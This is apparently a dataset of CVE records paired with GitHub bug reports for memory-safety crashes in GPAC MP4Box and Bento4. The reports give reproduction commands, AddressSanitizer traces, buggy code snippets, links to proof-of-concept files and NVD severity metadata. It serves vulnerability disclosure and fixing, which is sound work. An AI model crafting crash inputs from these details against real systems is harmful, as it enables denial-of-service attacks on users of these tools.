- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). It's a memcpy from unknown addrees bug. Step to reproduce: 1.get latest commit code (GPAC version 1.1.0-DEV-rev1170-g592ba2689-master) 2.compile with --enable-sanitizer 3.run ./MP4BOX -hint poc_isom_hinter -out /dev/null Env: Ubunut 20.04 , clang 12.0.1 ASAN report ``` ================================================================= ==194694==ERROR: AddressSanitizer: unknown-crash on address 0x03e8ef58ac20 at pc 0x0000004a3cd7 bp 0x7ffdef589370 sp 0x7ffdef588b38 READ of size 24912 at 0x03e8ef58ac20 thread T0 #0 0x4a3cd6 in __asan_memcpy (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4a3cd6) #1 0x7f35556d80ef in gf_bs_write_data /home/lly/pro/gpac_public/src/utils/bitstream.c:1028:4 #2 0x7f3555da5a1a in gf_odf_write_default /home/lly/pro/gpac_public/src/odf/odf_code.c:1320:3 #3 0x7f3555da92ec in gf_odf_desc_write_bs /home/lly/pro/gpac_public/src/odf/odf_codec.c:325:6 #4 0x7f3555da92ec in gf_odf_desc_write /home/lly/pro/gpac_public/src/odf/odf_codec.c:343:6 #5 0x7f3555da9661 in gf_odf_desc_copy /home/lly/pro/gpac_public/src/odf/odf_codec.c:387:6 #6 0x7f3555cb8760 in gf_isom_set_extraction_slc /home/lly/pro/gpac_public/src/isomedia/isom_write.c:5468:9 #7 0x7f3555fa467b in gf_hinter_finalize /home/lly/pro/gpac_public/src/media_tools/isom_hinter.c:1245:5 #8 0x4e8d21 in HintFile /home/lly/pro/gpac_public/applications/mp4box/main.c:3550:2 #9 0x4f5988 in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:6329:7 #10 0x7f355476d0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x429a6d in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x429a6d) Address 0x03e8ef58ac20 is located in the high shadow area. ``` Buggy code in bitstream.c: ``` u32 gf_bs_write_data(GF_BitStream *bs, const u8 *data, u32 nbBytes) { ... memcpy(bs->original + bs->position - bs->bytes_out, data, nbBytes); <---data is not inited ... } ``` [poc.zip](https://github.com/gpac/gpac/files/7036109/poc.zip)
Bug: Memcpy from unknown addrees in MP4BOX at src/utils/bitstream.c:1028
https://api.github.com/repos/gpac/gpac/issues/1885/comments
0
2021-08-24T02:45:45Z
2021-08-30T15:33:43Z
https://github.com/gpac/gpac/issues/1885
977,647,480
1,885
3,797
CVE-2021-40607
2022-06-28T13:15:09.797
The schm_box_size function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1879" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1879" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/gpac/gpac/issues/1879
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). It's a heap-buffer-overflow bug caused by missing '\0' check of the end of URI. **Step to reproduce:** 1.get latest commit code (MP4Box - GPAC version 1.1.0-DEV-rev1169-gbbd741e-master) 2.compile with --enable-sanitizer 3.run ./MP4BOX -hint poc -out /dev/null **Env:** Ubunut 20.04 , clang 10.0.0 **ASAN report** ``` ==789683==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000bb7 at pc 0x7f277ca50a6d bp 0x7ffd14f790b0 sp 0x7ffd14f78858 READ of size 40 at 0x604000000bb7 thread T0 #0 0x7f277ca50a6c (/lib/x86_64-linux-gnu/libasan.so.5+0x67a6c) #1 0x7f277a6d0ece in schm_box_size isomedia/box_code_drm.c:179 #2 0x7f277a7569f1 in gf_isom_box_size_listing isomedia/box_funcs.c:1903 #3 0x7f277a7569f1 in gf_isom_box_size isomedia/box_funcs.c:1915 #4 0x7f277a805c14 in WriteInterleaved isomedia/isom_store.c:1870 #5 0x7f277a8086d3 in WriteToFile isomedia/isom_store.c:2527 #6 0x7f277a7a73d9 in gf_isom_write isomedia/isom_read.c:600 #7 0x7f277a7a778f in gf_isom_close isomedia/isom_read.c:624 #8 0x562161c082db in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:6401 #9 0x7f27799da0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #10 0x562161bd2bdd in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4abdd) 0x604000000bb7 is located 0 bytes to the right of 39-byte region [0x604000000b90,0x604000000bb7) allocated by thread T0 here: #0 0x7f277caf6bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8) #1 0x7f277a6d08b7 in schm_box_read isomedia/box_code_drm.c:148 SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0x67a6c) Shadow bytes around the buggy address: 0x0c087fff8120: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff8130: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff8140: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 01 0x0c087fff8150: fa fa 00 00 00 00 04 fa fa fa 00 00 00 00 05 fa 0x0c087fff8160: fa fa 00 00 00 00 00 06 fa fa 00 00 00 00 02 fa =>0x0c087fff8170: fa fa 00 00 00 00[07]fa fa fa 00 00 00 00 00 00 0x0c087fff8180: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa ``` **Buggy code and reason:** ``` GF_Err schm_box_size(GF_Box *s) { GF_SchemeTypeBox *ptr = (GF_SchemeTypeBox *) s; if (!s) return GF_BAD_PARAM; ptr->size += 8; if (ptr->flags & 0x000001) ptr->size += 1 + (ptr->URI ? strlen(ptr->URI) : 0); <---strlen overflow once URI does not end with '\0' return GF_OK; } ``` [poc.zip](https://github.com/gpac/gpac/files/7011391/poc.zip)
BUG: heap-buffer-overflow in MP4Box at src/isomedia/schm_box_size:179
https://api.github.com/repos/gpac/gpac/issues/1879/comments
0
2021-08-19T02:52:37Z
2021-08-30T15:33:42Z
https://github.com/gpac/gpac/issues/1879
974,213,413
1,879
3,798
CVE-2021-40608
2022-06-28T13:15:09.840
The gf_hinter_track_finalize function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1883" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1883" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "908" ]
908
https://github.com/gpac/gpac/issues/1883
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). It's a pointer free on unknown addrees bug caused by freeing a uninitialized pointer. Step to reproduce: 1.get latest commit code (GPAC version 1.1.0-DEV-rev1170-g592ba26-master) 2.compile with --enable-sanitizer 3.run ./MP4BOX -hint poc_isom_hinter -out /dev/null Env: Ubunut 20.04 , clang 10.0.0 ASAN report ``` ==40495==ERROR: AddressSanitizer: SEGV on unknown address 0x7f0eebe5ccf8 (pc 0x7f0eef8765fc bp 0x7f0eebe5ccf8 sp 0x7ffecbe40880 T0) #0 0x7f0eef8765fb (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x215fb) #1 0x7f0eef8ed29d in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9829d) #2 0x7f0eed579cb9 in gf_hinter_track_finalize media_tools/isom_hinter.c:956 #3 0x42842d in HintFile /home/lly/gpac_public/applications/mp4box/main.c:3533 #4 0x42e4e4 in mp4boxMain /home/lly/gpac_public/applications/mp4box/main.c:6329 #5 0x7f0eead8983f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #6 0x413bc8 in _start (/home/lly/gpac_public/bin/gcc/MP4Box+0x413bc8) ``` Buggy code and reason: in isom_hinter.c:950 ``` for (i=0; i<gf_isom_get_sample_description_count(tkHint->file, tkHint->TrackNum); i++) { u8 *tx3g; <---with out init ... gf_isom_text_get_encoded_tx3g(..., &tx3g, &tx3g_len); <--- supposed to init tx3g ... gf_free(tx3g); <--- free tx3g ... } ``` It is supposed to init tx3g in gf_isom_text_get_encoded_tx3g, but in gf_isom_text_get_encoded_tx3g, it might forget that mission. ``` GF_Err gf_isom_text_get_encoded_tx3g(GF_ISOFile *file, u32 track, u32 sidx, u32 sidx_offset, u8 **tx3g, u32 *tx3g_size) { ... // it returns without init tx3g once a->type equals another value; if ((a->type != GF_ISOM_BOX_TYPE_TX3G) && (a->type != GF_ISOM_BOX_TYPE_TEXT)) return GF_BAD_PARAM; ... *tx3g = NULL; <--- real init here *tx3g_size = 0; gf_bs_get_content(bs, tx3g, tx3g_size); gf_bs_del(bs); return GF_OK; } ``` [poc_isom_hinter.zip](https://github.com/gpac/gpac/files/7019247/poc_isom_hinter.zip)
BUG : free on unknown addrees in MP4BOX at gf_hinter_track_finalize media_tools/isom_hinter.c:956
https://api.github.com/repos/gpac/gpac/issues/1883/comments
0
2021-08-20T05:15:45Z
2021-08-30T15:33:43Z
https://github.com/gpac/gpac/issues/1883
975,274,297
1,883
3,799
CVE-2021-40609
2022-06-28T13:15:09.880
The GetHintFormat function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1894" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1894" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/gpac/gpac/issues/1894
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). It's a heap-buffer-overflow bug Step to reproduce: 1.get latest commit code (GPAC version 1.1.0-DEV-rev1170-g592ba26-master) 2.compile with --enable-sanitizer 3.run ./MP4BOX info poc Env: Ubunut 20.04 , clang 12.0.1 ASAN report ``` ==2275020==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000638 at pc 0x7f1c17ca68a4 bp 0x7ffd52eab1d0 sp 0x7ffd52eab1c8 READ of size 4 at 0x604000000638 thread T0 #0 0x7f1c17ca68a3 in GetHintFormat /home/lly/pro/gpac_public/src/isomedia/hint_track.c:46:22 #1 0x7f1c17ca68a3 in CheckHintFormat /home/lly/pro/gpac_public/src/isomedia/hint_track.c:58:6 #2 0x7f1c17ca68a3 in gf_isom_get_payt_count /home/lly/pro/gpac_public/src/isomedia/hint_track.c:979:7 #3 0x5b52e5 in DumpTrackInfo /home/lly/pro/gpac_public/applications/mp4box/filedump.c:3178:14 #4 0x5e4af1 in DumpMovieInfo /home/lly/pro/gpac_public/applications/mp4box/filedump.c:3789:3 #5 0x52ea16 in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:6023:9 #6 0x7f1c15d710b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x429aad in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x429aad) 0x604000000638 is located 0 bytes to the right of 40-byte region [0x604000000610,0x604000000638) allocated by thread T0 here: #0 0x4a496d in malloc (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4a496d) #1 0x7f1c17543a17 in nmhd_box_new /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:4651:2 #2 0x7f1c1775de4f in gf_isom_box_new_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1673:6 #3 0x7f1c17756209 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:239:12 #4 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #5 0x7f1c1751e43a in minf_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:3527:6 #6 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #7 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #8 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #9 0x7f1c17511b3d in mdia_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:3078:6 #10 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #11 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #12 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #13 0x7f1c17582c10 in trak_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:6734:6 #14 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #15 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #16 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #17 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #18 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #19 0x7f1c177548b9 in gf_isom_parse_root_box /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:38:8 #20 0x7f1c177e2347 in gf_isom_parse_movie_boxes_internal /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:320:7 #21 0x7f1c177e2347 in gf_isom_parse_movie_boxes /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:781:6 #22 0x7f1c177f84d3 in gf_isom_open_file /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:901:19 #23 0x53c4b8 in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:5841:12 #24 0x7f1c15d710b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lly/pro/gpac_public/src/isomedia/hint_track.c:46:22 in GetHintFormat Shadow bytes around the buggy address: 0x0c087fff8070: fa fa 00 00 00 00 04 fa fa fa 00 00 00 00 00 00 0x0c087fff8080: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8090: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff80a0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff80b0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 =>0x0c087fff80c0: fa fa 00 00 00 00 00[fa]fa fa 00 00 00 00 00 00 0x0c087fff80d0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff80e0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa 0x0c087fff80f0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff8100: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff8110: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ``` [poc.zip](https://github.com/gpac/gpac/files/7051614/poc.zip)
heap-buffer-overflow in MP4BOX at souce file src/isomedia/hint_track.c:46
https://api.github.com/repos/gpac/gpac/issues/1894/comments
0
2021-08-26T04:44:12Z
2021-08-30T15:33:44Z
https://github.com/gpac/gpac/issues/1894
979,828,664
1,894
3,800
CVE-2021-40943
2022-06-28T13:15:09.920
In Bento4 1.6.0-638, there is a null pointer reference in the function AP4_DescriptorListInspector::Action function in Ap4Descriptor.h:124 , as demonstrated by GPAC. This can cause a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/643" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/643" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-638:*:*:*:*:*:*:*", "matchCriteriaId": "2122DA5E-A523-4D07-B017-982DF2B8B829", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/axiomatic-systems/Bento4/issues/643
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
How to reproduce: ``` 1.check out latest code, 5922ba762a 2.compile with asan, set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address -g") set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") 3.run ./mp4dump --verbosity 3 --format text poc ``` You can see the asan information below: ``` ================================================================= ==633802==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000003c3e48 bp 0x7ffcbc9d4550 sp 0x7ffcbc9d4470 T0) ==633802==The signal is caused by a READ memory access. ==633802==Hint: address points to the zero page. #0 0x3c3e48 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const /home/lly/pro/Bento4/Source/C++/Core/Ap4Descriptor.h:124:21 #1 0x40bdc2 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/lly/pro/Bento4/Source/C++/Core/Ap4List.h:353:12 #2 0x40bdc2 in AP4_InitialObjectDescriptor::Inspect(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:327:22 #3 0x3e0485 in AP4_IodsAtom::InspectFields(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:112:29 #4 0x37117e in AP4_Atom::Inspect(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #5 0x39f0a2 in AP4_AtomListInspector::Action(AP4_Atom*) const /home/lly/pro/Bento4/Source/C++/Core/Ap4Atom.h:601:15 #6 0x39d3b1 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/lly/pro/Bento4/Source/C++/Core/Ap4List.h:353:12 #7 0x39d3b1 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220:16 #8 0x37117e in AP4_Atom::Inspect(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #9 0x359b43 in main /home/lly/pro/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:350:15 #10 0x7f899655d0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x2a2b1d in _start (/home/lly/pro/Bento4/cmakebuild/mp4dump+0x2a2b1d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/lly/pro/Bento4/Source/C++/Core/Ap4Descriptor.h:124:21 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const ==633802==ABORTING ``` [poc.zip](https://github.com/axiomatic-systems/Bento4/files/7043072/poc.zip)
Null pointer reference in Ap4Descriptor.h:124
https://api.github.com/repos/axiomatic-systems/Bento4/issues/643/comments
0
2021-08-25T02:00:03Z
2021-08-25T02:00:03Z
https://github.com/axiomatic-systems/Bento4/issues/643
978,627,371
643
3,801
CVE-2021-40944
2022-06-28T13:15:09.963
In GPAC MP4Box 1.1.0, there is a Null pointer reference in the function gf_filter_pid_get_packet function in src/filter_core/filter_pid.c:5394, as demonstrated by GPAC. This can cause a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
